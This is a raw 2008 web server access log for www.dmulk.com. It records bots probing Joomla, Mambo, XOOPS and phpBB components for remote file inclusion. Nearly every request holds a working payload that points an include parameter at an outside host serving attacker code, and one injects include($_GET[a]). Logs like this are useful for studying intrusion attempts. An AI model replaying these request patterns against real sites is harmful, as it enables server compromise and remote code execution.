210.240.12.14 - - [24/Jun/2008:12:32:16 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:32:16 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:30 -0700] "GET /logs/access_071216.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:30 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:30 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:32:36 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:33:14 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:33:18 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:33:18 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:33:19 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:33:20 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:33:22 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:12:33:25 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:33:35 -0700] "GET /logs/access_080301.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:33:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:33:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:33:44 -0700] "GET /logs/access_080222.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:33:51 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:33:51 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:34:00 -0700] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:12:34:02 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:12:34:03 -0700] "GET /classes/core/language.php?rootdir=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:12:34:03 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:07 -0700] "GET /logs/access_080321.log//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:07 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:08 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.212.113.110 - - [24/Jun/2008:12:34:24 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://hafidz.info/fidz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.212.113.110 - - [24/Jun/2008:12:34:24 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://hafidz.info/fidz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.212.113.110 - - [24/Jun/2008:12:34:25 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://hafidz.info/fidz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:30 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:30 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.12.14 - - [24/Jun/2008:12:34:31 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:34:32 -0700] "GET /logs/access_080127.log//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:34:42 -0700] "GET /logs/access_080423.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
141.212.113.110 - - [24/Jun/2008:12:34:51 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://hafidz.info/fidz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:34:51 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:34:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:35:17 -0700] "GET /logs/access_080425.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:35:47 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:35:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:35:55 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.170 - - [24/Jun/2008:12:36:00 -0700] "GET /logs/access.log/admin/templates/template_thumbnail.php?thumb_template=http://200.169.80.9/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.170 - - [24/Jun/2008:12:36:00 -0700] "GET /admin/templates/template_thumbnail.php?thumb_template=http://200.169.80.9/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.170 - - [24/Jun/2008:12:36:01 -0700] "GET /logs/admin/templates/template_thumbnail.php?thumb_template=http://200.169.80.9/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.119 - - [24/Jun/2008:12:36:19 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [24/Jun/2008:12:36:19 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:36:31 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:36:32 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:36:54 -0700] "GET /logs//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:36:54 -0700] "GET /logs//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:36:54 -0700] "GET //port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:36:54 -0700] "GET //port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:37:06 -0700] "GET /logs/access.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:37:08 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:37:09 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:12:37:12 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:37:12 -0700] "GET /logs/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:37:27 -0700] "GET /index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:37:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.65 - - [24/Jun/2008:12:38:05 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.65 - - [24/Jun/2008:12:38:05 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.65 - - [24/Jun/2008:12:38:06 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.65 - - [24/Jun/2008:12:38:08 -0700] "GET /logs/access_080312.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:38:11 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:38:12 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:38:18 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:38:18 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:38:24 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:38:24 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:38:24 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:38:25 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:38:31 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:38:32 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.25 - - [24/Jun/2008:12:38:33 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:38:34 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:38:35 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:38:37 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:38:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:38:44 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.69" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:38:52 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.20.73.217 - - [24/Jun/2008:12:39:22 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:39:47 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
196.40.71.237 - - [24/Jun/2008:12:39:55 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:12:39:57 -0700] "GET /index.php?x=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 200 18435 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:40:05 -0700] "GET /logs/access_080118.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:40:14 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:40:14 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:40:15 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:40:15 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.179.18 - - [24/Jun/2008:12:40:18 -0700] "GET /logs/access.log//admin/templates/template_thumbnail.php?thumb_template=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [24/Jun/2008:12:40:19 -0700] "GET //admin/templates/template_thumbnail.php?thumb_template=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [24/Jun/2008:12:40:19 -0700] "GET /logs//admin/templates/template_thumbnail.php?thumb_template=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:40:20 -0700] "GET /logs/access.log//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:40:21 -0700] "GET /logs/access.log//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:40:40 -0700] "GET /logs/access_080321.log//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:40:41 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:40:42 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:40:43 -0700] "GET /logs/access_080215.log//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:12:40:44 -0700] "GET /logs/access_080215.log//port.php?content=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [24/Jun/2008:12:41:02 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jun/2008:12:41:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jun/2008:12:41:11 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jun/2008:12:41:11 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.72.9.26 - - [24/Jun/2008:12:41:25 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:41:30 -0700] "GET /logs/access.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:41:30 -0700] "GET ////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:41:30 -0700] "GET /logs/access_080106.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:12:41:30 -0700] "GET /logs////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:41:35 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:41:35 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.26 - - [24/Jun/2008:12:41:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:42:11 -0700] "GET ////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:42:11 -0700] "GET /logs/access_080108.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:12:42:11 -0700] "GET /logs////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:42:16 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:42:16 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
